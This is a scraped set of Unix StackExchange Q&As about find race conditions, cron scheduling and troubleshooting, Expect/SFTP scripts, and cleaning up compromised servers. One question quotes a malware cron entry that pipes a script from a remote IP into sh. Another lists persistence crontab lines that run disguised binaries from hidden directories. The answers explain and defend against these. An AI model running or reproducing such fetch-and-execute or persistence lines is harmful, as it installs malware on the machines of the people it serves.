Note that -exec rm {} + has race condition vulnerabilities which -delete (where available) doesn't have. So don't use it on directories that are writeable by others. Some finds also have a -execdir that mitigates against those vulnerabilities.
I didn't actually see this elaborated there(*), but the race I can see there relates to how -exec rm passes the full path to the file, causing the tree to be traversed again within the rm process.
After find traverses the tree and evaluates the conditions it's given on the command line, rm traverses the tree again, and it doesn't know about the conditions given to find, so now they are not checked. With -delete and -execdir , find traverses the tree, makes whatever checks it's given, and then deletes the file, all the time keeping a file descriptor open on the directories.
Someone could get in between and rename a file or directory between find evaluating its conditions and rm running. So, something like this:
root runs find . -type f -user joe -exec rm -f {} \;
find runs and finds directory ./this/, holding some files owned by user joe
another user renames ./this and creates a symlink with the same name, pointing somewhere else
find runs rm -f ./this/hello.txt, now following the symlink.
hello.txt could now be owned by anyone, not just user joe, and since find was launched as root, rm also is, and it happily removes the file at the other end of the symlink. This is a classic time-of-check to time-of-use (TOCTTOU) vulnerability.
One can probably come up worse examples, but that's a general idea.
With -delete or -execdir, this can't happen, since the file descriptor find has open on ./this still points to the same directory, even if that directory is renamed. -execdir runs rm with it's working directory set to that directory (there's the fchdir() system call that changes the working directory by file descriptor, again not going through a name lookup), while -delete similarly deletes the using a name relative to the containing directory (with unlinkat()).
Note that by default (i.e. without the -L option), find doesn't follow symlinks found when traversing the directory tree. This doesn't help here, since again rm just passes the path it was given to the underlying system call, and symlinks are followed there as usual. It does mean that the replaced directory (./this above) has to be an actual directory replaced with a symlink (or another directory) though, not a symlink replaced by another symlink.
(*)20 minutes after writing this, I noticed Stéphane's answer (linked below) did have a link to the GNU manual describing the same race issue. (sigh.)
The issues with -delete implying -depth, and making -prune ineffective
is unrelated to that, and not a race condition. This is mentioned in Why did find with -delete erase the files in my /save/ directory when find without delete was not able to locate them? GNU coreutils find seems to have acquired an error message for that:
$ find a -name foo -prune -o -name hello.txt -delete
find: The -delete action automatically turns on -depth, but -prune does nothing when -depth is in effect. If you want to carry on anyway, just explicitly use the -depth option.
Another difference is that -exec rm -f -- {} + uses only standard tools, while -delete is not standard, even if somewhat commonly supported. E.g. FreeBSD and GNU support it, but Busybox doesn't. See: find: "-exec rm {} ;" vs. "-delete" - why is the former widely recommended? on superuser.com.
| Cron job to delete all files older than 7 days: -exec rm -f {} \; vs -delete [duplicate] |
1,459,409,985,000 |
I have seen a lot of times (1, 2 )this question, but I didn't find the answer, so here I go.
I'm running Debian 11, but I guess it works the same for any Debian-like distro.
My crontab -e looks like:
...
@reboot sleep 20 && /opt/isPromscaleOnOrOff.sh
...
And the content of isPromscaleOnOrOff.sh:
#!/bin/bash
SERVICE="promscale"
if pgrep -x "$SERVICE" >/dev/null
then
echo "$SERVICE is running"
else
echo "$SERVICE is stopped, I will run it now"
nohup promscale --db-name asdf1234--db-password asdf1234 --db-user asdf1234 --db-ssl-mode allow --install-extensions & >> /dev/null
disown
fi
But when I restart the VM the script isn't runing, tho the cron logs in /var/log/syslog show the crontab starting the script.
What I wanna achieve can be easilly done daemonizing the process (wich I indeed did), I just wanna know why crontab doesn't start up my script.
|
Jobs run through cron aren't run in the same runtime environment that you have on your desktop. None of your PATH changes, or other environment variable settings from ~/.bashrc are automatically propagated to your cron job. For example, there's no $DISPLAY, so GUI programs need special treatment (read man xhost).
One can set environment variables for all one's cron jobs in the crontab file
Read man 5 crontab.
Look at the results of echo "=== id ===";id;echo "=== set ===";set;echo "=== env ===";env | sort;echo "=== alias ===";alias in each of your environments.
Since the command part of the crontab line is, by default, interpreted by /bin/sh, which has a simpler syntax than /bin/bash, I recommend having command be a call to a bash script (executable, mounted, starts with #!/bin/bash) which sets up the environment, then calls the desired program.
| Why crontab doesn't execute a scheduled bash script? |
1,459,409,985,000 |
I'm using Linux Centos 7, as a non-root user. When I want to add cron job that is not possible, I enter
crontab -e
I don't have option to select editor or to add cron job, just have blue ~ signs??
Also command select-editor does not exist.
Any help? What should I do?
Screenshoot:
http://prntscr.com/qxu06n
|
That is VIM (or possibly another vi clone). You are in a text editor. To add a cron job, just edit using that editor.
You do not have select-editor because that is part of the "sensible-utils" package on Debian. (Previously it was part of a "debianutils" package which was more obviously Debian-specific.) That package is in the EPEL, not in CentOS proper.
The thing that RedHat has adopted from Debian is the "alternatives" system. That controls what the editor command maps to.
There are several possibilities:
Your VISUAL environment variable points to vim (or vi).
Your VISUAL environment variable points to editor, and the currently selected alternative for editor is VIM.
Your VISUAL environment variable is unset, the fallback is editor, and the currently selected alternative for editor is VIM.
Your VISUAL environment variable is unset, the fallback is vim (or perhaps vi).
There are two approaches to changing the editor, if you want to use another one:
Change what your VISUAL environment variable points to. Depending from how you set it in the shell, this changes full-screen editor for just the current interactive shell session, or even just the current command (if you assign the variable as a prefix to a simple command). You can of course set it in a login script.
Unset your VISUAL environment variable and change the alternative for editor. This changes the meaning of editor for everyone on the system, note. It also depends from the assumption that editor is the fallback when the environment variable is unset. That's a reasonable fallback to use on "alternatives" operating systems like Debian, OpenSUSE, and Fedora/CentOS/RHEL. But the fallback logic is of course encoded in many individual commands and scripts and not every software author chooses editor as the fallback.
Further reading
Alternatives command and Centos7
https://unix.stackexchange.com/a/477769/5132
Jonathan de Boyne Pollard (2020). Unix editors and pagers. Frequently Given Answers.
| crontab -e doesnt shows option to select editor - what to do? |
1,459,409,985,000 |
I was hacked this morning!
Does anyone have an idea of what the entry of the crontab below might mean?
1st They created a dir structure
.rsync/
├── a
│ ├── a
│ ├── anacron
│ ├── cron
│ ├── init0
│ ├── run
│ └── stop
2nd: The executed this cronjob
from: crontab -l
0 */3 * * /home/ftpuser/.nullcache/a/upd>/dev/null 2>&1
@reboot /home/ftpuser/.nullcache/a/upd>/dev/null 2>&1
5 8 * * 0 /home/ftpuser/.nullcache/b/sync>/dev/null 2>&1
@reboot /home/ftpuser/.nullcache/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X17-unix/.rsync/c/aptitude>/dev/null 2>&1
Last: ran all my CPU's at 100% and sucked all the bandwith from the network.
I killed all associated PID'S to ftpuser and everything went back to normal
|
You have not solved the problem.
What you found may only be the tip of the iceberg. There are many ways to hide malware. What you could see easily may well be designed to lull you into a false sense of security.
Even if you managed to find all the malware, until you've found and plugged the hole it used to get in, it's likely to reappear.
If you have other people's data (including but not limited to private identifying information such as email addresses, IP addresses, purchase histories, usage logs, etc.), you need to notify these people of the breach and let them know in what way their data may be compromised. It's not just a good idea, it's the law in many places.
You need to take the system down, investigate how the malware got in, and reinstall a clean copy from scratch.
For more information, see How do I deal with a compromised server?.
This does look like some fairly unsophisticated malware. It's in directories with vaguely plausible names:
ftpuser is a user that might concievably exist on some servers whose structure is stuck a decade or two ago. (Authenticated FTP should have been long replaced by SSH including SFTP. Anonymous FTP has been pretty much replaced by HTTP(s).)
.nullcache is hidden in some listings. “Nullcache” is a thing in various contexts; while I'm not aware of a tool that uses a .nullcache directory, it's just plausible enough not to look completely out of place in a directory listing.
aptitude is a system administration tool that wouldn't be out of place in a process listing (on distributions that use it, i.e. Debian and derivatives). sync is a standard utility, but one that doesn't normally run for long, so while it would be out of place in a process listing, it has a harmless look. upd is not a standard name, but it looks harmless because it looks like it's short for “update”.
anacron and cron are common tools and there are directories with this name on many systems (in /var/spool). init0 is close to init. A run exists in various places (/run, /var/run). stop is uncommon as a directory name, but again not completely out of place.
/tmp/.X17-unix is completely implausible, but is visually similar to /tmp/.X11-unix which exists on all systems running the X Window System (X11) which the standard Unix is based on, and many people wouldn't know that the number 11 is significant.
The cron jobs run various binaries in these vaguely plausible locations at boot time (@reboot), once a week (5 8 * * 0) or roughly every three days (0 0 */3 * *).
| Unauthorized access to cron |
1,459,409,985,000 |
I have a python script on my RaspberryPi that I want to run at these general times:
Weekdays, after 4:30 PM until 00:00 running every 30 minutes
Weekends, after 8:00 AM until 00:00, running every 60 minutes
I know how to schedule it daily with Cron,
30 16 * * 1-5 /mnt/myHDD/myscript.py
but can't figure out how to have it run every X minutes, until Y time.
I think to run every 30 minutes, I'd do this correct? But how to also run every hour from 16:30 until 02:00 next day?
1-59/30 * * 1-5 /mnt/myHdd/myscript.py
Edit: sorry, to clarify it doesn't have to be exactly every 30 minutes...the script simply downloads pictures from my phone to my rpi and I'd like it to run every so often during the weekdays when I'm home (ie after 1630/1700) and then on weekends every say hour from general "waking hours".
|
Please see my EDIT at the end of this answer.
This answer is "close" to your first requirement:
*/30 16-23,0 * * 1-5
Translation: “At every 30th minute past every hour from 16 through 23 and 0 on every day-of-week from Monday through Friday.”
The first answer misses because it doesn't run every half-hour. Perhaps you could kludge around that by placing a sleep in your code:
time.sleep( 1800 )
And this answer is "close" to your first requirement:
0,*/30 16-23,0 * * 1-5
Translation: “At minute 0 and every 30th minute past every hour from 16 through 23 and 0 on every day-of-week from Monday through Friday.”
The second answer misses because it runs at 16:00, 30 minutes in advance of when you wished to start. This is probably a "closer" match to your stated requirements, if that doesn't matter. If it does matter, and you can wait until 17:00, then a simple change to the schedule will take care of that:
0,*/30 17-23,0 * * 1-5
This is the answer to your second requirement:
0 8-23,0 * * 6-7
EDIT: I had a mental block. It's occurred to me that there is an exact answer to your question. It's to have 3 crontab entries instead of just 2:
0,*/30 17-23,0 * * 1-5 /mnt/myHDD/myscript.py
30 16 * * 1-5 /mnt/myHDD/myscript.py
0 8-23,0 * * 6-7 /mnt/myHDD/myscript.py
| Schedule python script every day, between certain hours, every X minutes |
1,459,409,985,000 |
I have this cronjob:
#!/bin/bash
YEAR=`date +%Y`
MONTH=`date +%m`
DAY=`date +%d`
mkdir -p $YEAR/$MONTH/$DAY
mysqldump -uroot -p1234 locatari > $YEAR/$MONTH/$DAY/backup.sql
And I want to run this at each let's say 3 minutes. I tried with each of these crontab commands and none on them seems to work:
3 * * * * /usr/bin /home/rome/cronjob/back.sh > /home/rome/cronjob
3 * * * * /home/rome/cronjob/back.sh/
3 * * * * exec `/bin/bash /home/rome/cronjob/back.sh`
3 * * * * /bin/bash /home/rome/cronjob/back.sh > /dev/null 2>&1
I only made it run when I did:
bash back.sh
All worked as expected with the bash command, what is wrong to my cron scheduler? Problem is that with the crontab command, I can't see my output, it only works with bash command.
|
None of your crontab job entries matches what you typed at the command line
/usr/bin /home/rome/cronjob/back.sh tries to run a program /usr/bin, but that's a directory
/home/rome/cronjob/back.sh/ tries to treat your script as a directory
exec `/bin/bash /home/rome/cronjob/back.sh` tries to use the output of your program as a program name to run
/bin/bash /home/rome/cronjob/back.sh > /dev/null 2>&1 this might work, except that you have thrown away all the output of the script, so you won't see any errors
Based on feedback from your comments it seems you probably want something like this (I've omitted /home/rome because that is your home directory anyway):
*/3 * * * * cd cronjob && bash back.sh >back.log 2>&1
| Cronjob output not working [closed] |
1,459,409,985,000 |
I am pretty new to unix systems and their workings. Is there any way to schedule a cron job in unix which runs on every day 12:00 AM and checks if the day is Thursday it stops a service and if the day is Friday it starts the service again?
|
You're overcomplicating it by trying to make one job that conditionally does two things. You want one job to start the service on Thursday, and another to start it on Friday, as in the following cron table.
0 0 * * 4 service myspiffyservice stop > /dev/null 2>&1 # stop myspiffyservice on Thursday
0 0 * * 5 service myspiffyservice start > /dev/null 2>&1 # start myspiffyservice on Friday
If you are talking about executing a job rather than starting or stopping a service, this can also be handled by one cron job that only runs on nonThursdays:
0 0 * * 0-3,5-6 /path/to/myspiffyjob > /dev/null 2>/dev/null # Run spiffy job on non-Thursdays
The above schedule translates to 'At 00:00 on every day-of-week from Sunday through Wednesday and every day-of-week from Friday through Saturday'.
| scheduling cron jobs to stop a service on Thursday and start it on Friday |
1,459,409,985,000 |
I have a script in Linux that creates a file which once created it executes an Expect script that uploads the created file to an SFTP server. I have this running in cron and for whatever reason the upload always fails, however when I execute the script in the shell the upload is successful. I checked the logs and they're not really telling me where the process is going wrong.
Here's the shell script
#!/bin/bash
cd /home/mysql/paradata/repoupload || exit
mv /mnt/restrictedreports/Restricted/Corporate/Accounting/GL2013/gldetail.csv /home/mysql/paradata/repoupload 2>/dev/null
mv /mnt/restrictedreports/Restricted/Corporate/Accounting/GL2013/vgldetail.csv /home/mysql/paradata/repoupload 2>/dev/null
test -f gldetail.csv && ./SAFCO.sh
test -f vgldetail.csv && ./SAFCO.sh
if [ -f vgldetail.csv ]; then filename=vgldetail.csv; fi
if [ -f gldetail.csv ]; then filename=gldetail.csv; fi
if [ $filename == gldetail.csv ];
then
./uploadsafco.exp REPOEX > lastftplogsafco.txt
else
./uploadvafco.exp REPOEX > lastftplogvafco.txt
fi
Here's the expect script
#!/usr/bin/expect -f
set force_conservative 0 ;# set to 1 to force conservative mode even if
;# script wasn't run conservatively originally
if {$force_conservative} {
set send_slow {1 .1}
proc send {ignore arg} {
sleep .1
exp_send -s -- $arg
}
}
set arg1 [lindex $argv 0]
set timeout 30
expect_after {
timeout { puts "Timeout"; exit 1 }
}
spawn sftp not@this
match_max 100000
expect "password: "
send -- "notapassword\r"
expect -exact "\r
sftp> "
send -- "cd /usr/data/r1/ED\r"
expect "sftp> "
send -- "progress\r"
expect -exact "progress\r
Progress meter disabled\r
sftp> "
send -- "put REPOEX\r"
expect "sftp> "
send -- "chmod 777 REPOEX\r"
expect "sftp> "
send -- "bye\r"
expect eof
exit
|
"Works manually, fails in cron" is almost always due to one of these:
differences in environment variables: PATH and others;
different current working directory;
lack of a TTY (probably not an issue with expect scripts);
permissions (interactive testing with one user, cron job with another); or
different shell: commands executed in within the cron command line itself use one shell, you may be interactively using another.
| Expect script fails when running from cron but works when run manually |
1,459,409,985,000 |
In a means to suppress a malware that created a crontab entry below, II introduced the usage of cron.deny
*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh
However, all user crontabs suddenly stopped triggering every job.
During troubleshooting, I observed all cron associated file for all users are not editable.
ls -lht /etc/cron.denyus -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.deny
ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root
chmod 775 /etc/cron.deny
chmod: changing permissions of `/etc/cron.deny': Operation not permitted
chmod 775 /var/spool/cron/root
chmod: changing permissions of `/var/spool/cron/root': Operation not permitted
I later found out they all have an immutable attribute.
lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root
lsattr /etc/cron.deny
----i--------e- /etc/cron.deny
I changed the immutable attribute using commands below:
chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root
Yet the cron fails to trigger these jobs.
|
Stop there! Your system has been infected by a malware. At this point, you can't trust what your system says. The malware may have modified the kernel. What you see is what the malware wants you to see. The system may not behave consistently. Don't expect a file to be modified just because the editor saved it successfully, for example.
To reiterate, forget about understanding permissions, immutable attributes, etc. All that stuff is for a working system. On a compromised system, things do not behave in any consistent way.
What you need to do now is:
Take the server offline immediately. It may be infecting users with malware.
Take a backup. Don't erase any of your existing backups! You need a backup of the infected system for two reasons: to trace where the infection came from, and to ensure that you have the latest data.
Figure out how you got infected. This is important: if you bring the system back up with the same security hole as before, it'll get infected again.
Install a new system from scratch. You cannot reliably remove malware from a system. Malware tries to make this difficult, and you can never be sure that you out-tricked it.
Make sure to install the latest security updates of all software, and to configure it securely, so that it won't get infected again.
Restore your data. Make sure that you restore only data, and not vulnerable software.
See also How do I deal with a compromised server?
| Why are my crontab user files immutable and doesn't get executed even after changing attribute to mutable? |
1,459,409,985,000 |
I am trying to get a cronjob in /etc/cron.d/ to run the first Saturday of every month.
Here is what I have so far:
0 1 1-7 * 6 [`date +\%d` == 06] root && /home/test/cron-test.sh
I change the system date Jan 14, 2017 (a Saturday in 2017) at midnight and checking tail /var/log/syslog | grep cron-test reports:
Jan 14 00:59:21 Inspiron-1545 cron[936]: Error: bad username; while reading /etc/cron.d/cron-check1
Jan 14 00:59:21 Inspiron-1545 cron[936]: (*system*cron-check1) ERROR (Syntax error, this crontab file will be ignored)
What am I doing wrong?
|
System-wide crontabs have the five date and time fields on each line, then the username to run the cronjob as, then the command line. In yours, the time fields seem ok, but the sixth field [`date is rather odd for a username. The error message hints at that.
Since you have root mentioned after the snippet in brackets, I think you may have just misplaced the username, so you should have:
0 1 1-7 * 6 root [`date +\%d` == 06] && /home/test/cron-test.sh
This still has the issue that [ is a command just like others, so you have to use whitespace after the [ and before the ]. And == isn't standard for comparison, = is. Also, for command substitution, $(cmd) is just nicer than backticks, so let's try:
0 1 1-7 * 6 root [ $(date +\%d) = 06 ] && /home/test/cron-test.sh
But date +%d tells the day of month, and now you're only running on the sixth day of the month (regardless of weekday). The third and fifth fields (day of month and day of week) work a a bit oddly together: the cronjob runs if either of them matches. But we want to run only on a Saturday, and only on the first to seventh days of month, so we have to check one of the conditions manually.
0 1 1-7 * * root [ $(date +\%u) -eq 6 ] && /home/test/cron-test.sh
The cronjob itself runs on all of the first seven days of the month, but the manual test [ $(date +%u) -eq 6 ] checks that the day of week is Saturday, before actually running the main command.
(Some versions of the crontab(5) manual page have an example almost like that, but I can't find an online version of it.)
| /etc/cron.d/cronjob |
1,459,409,985,000 |
That has been a bit of a puzzle for me.
When I try the following cronjobs individually:
* * * * * /bin/bash -c "readlink /proc/$$/exe >> /root/printenv"
* * * * * /bin/bash -c "readlink /proc/$PPID/exe >> /root/printenv"
* * * * * /bin/bash -c "readlink /proc/self/exe >> /root/printenv"
* * * * * /bin/bash -c "ps -h -o comm -p $$ >> /root/printenv"
* * * * * /bin/bash -c "echo $SHELL" >> /root/printenv
I get the following results respectively:
/bin/dash
/usr/sbin/cron
/bin/readlink
sh
/bin/sh
I can't seem to have it report /bin/bash in any circumstances when called from cron like that.
In a direct cronjob * * * * * /bin/bash -c "command" how can I prove that "command" is being interpreted by /bin/bash (if it is) ?
Answer for future references:
Changing the double quote for a single quote returned the right shell:
* * * * * /bin/bash -c 'readlink /proc/$$/exe >> /root/printenv'
Returned:
/bin/bash
Thanks to all contributors to the answer below.
|
In this case my default shell is bash and I just ran a test:
sh -c 'echo $0'
result: sh
sh -c "echo $0"
result: -bash
bash -c 'echo $0'
result: bash
bash -c "echo $0"
result: -bash
it looks like you need to use single quotes ' followed by the -c switch
| How to prove that the interpreter is /bin/bash when called from cron? |
1,459,409,985,000 |
I run Ubuntu and Fedora on a day to day basis and usually run the package manager to check for updates nearly once a day.
When I get a kernel update I usually reboot, so that I'm running on the new kernel and I can see if there are any glitches (It's almost always fine).
If I add
apt-get update && apt-get -y upgrade
or
dnf check-update && dnf upgrade
to my root crontab is there anything procedurally wrong?
What if I set up crontab to do this at 4 a.m. and it installs a new kernel, then I don't reboot and it auto-installs a second new kernel. What if I don't reboot my Ubuntu box for a month and there have been 3 kernel updates and a couple of other patches to the same piece of software during this time?
Is it OK to enable automatic updating this way? I know that there's an 'unattended upgrades' utility for Ubuntu, but I'd rather learn what other system admins do and have a more 'hands on' approach to administering my PC's.
|
Generally, sysadmins with a mixed install base would use a cross-platform configuration management / orchestration system like Puppet, Chef, or Ansible to manage updates.
You could also set up one of those tools on a smaller scale if you like.
Or, on Fedora *, you can use DNF Automatic — see the Fedora page on configuring this. This is better than a simple cron script because it has better error handling and more options for output.
For Ubuntu, there are instructions on the community wiki for automatic updates, but I haven't used them so I can't comment more than to just provide the pointer.
* disclosure: I work on Fedora
| Is there a common way of auto-updates with cron? |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.